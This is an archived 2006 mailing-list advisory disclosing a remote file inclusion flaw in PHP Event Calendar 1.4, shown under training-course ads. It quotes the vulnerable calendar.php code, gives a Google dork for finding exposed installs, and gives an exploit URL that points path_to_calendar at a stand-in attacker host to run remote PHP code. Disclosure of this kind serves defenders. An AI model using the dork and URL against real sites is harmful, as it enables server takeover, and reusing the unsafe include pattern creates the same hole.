Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]

PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion

Subject: PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion
Date: 16 Jul 2006 03:41:16 -0000
#############################SolpotCrew 
Community################################
#
#        PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion 
#
#        Vendor site : http://www.softcomplex.com/products/php_event_calendar/
#
#################################################################################
#
#
#       Bug Found By :Solpot a.k.a (k. Hasibuan) (13th july 2006)
#
#       contact: chris_hasibuan@yahoo.com 
# 
#       Website : http://www.solpotcrew.org/adv/solpot-adv-01.txt
#
################################################################################
#
#
#      Greetz: choi , h4ntu , Ibnusina , Lappet_tutung , ilalang23 , r4dja , 
#              L0sTBoy , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa
#              home_edition2001 , Anggands , Rendy , cow_1seng
#              and all crew #mardongan @ irc.dal.net
#
#
###############################################################################
Input passed to the "path_to_calendar" is not properly verified 
before being used to include files. This can be exploited to execute 
arbitrary PHP code by including files from local or external resources.

code from calendar.php

if(!$path_to_calendar){
        $path_to_calendar = $_path_to_calendar;
}
extract($HTTP_POST_VARS);
extract($HTTP_GET_VARS);
include_once $path_to_calendar.'db.php';
function show_calendar($index_calendar='') {
        global $db,$path_to_data,$settings;

Google dork : inurl:/cl_files/

exploit : 
http://somehost/path_to_cl_files/calendar.php?path_to_calendar=http://evilcode


##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F##################################


<Prev in Thread] Current Thread [Next in Thread>
  • PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion, chris_hasibuan <=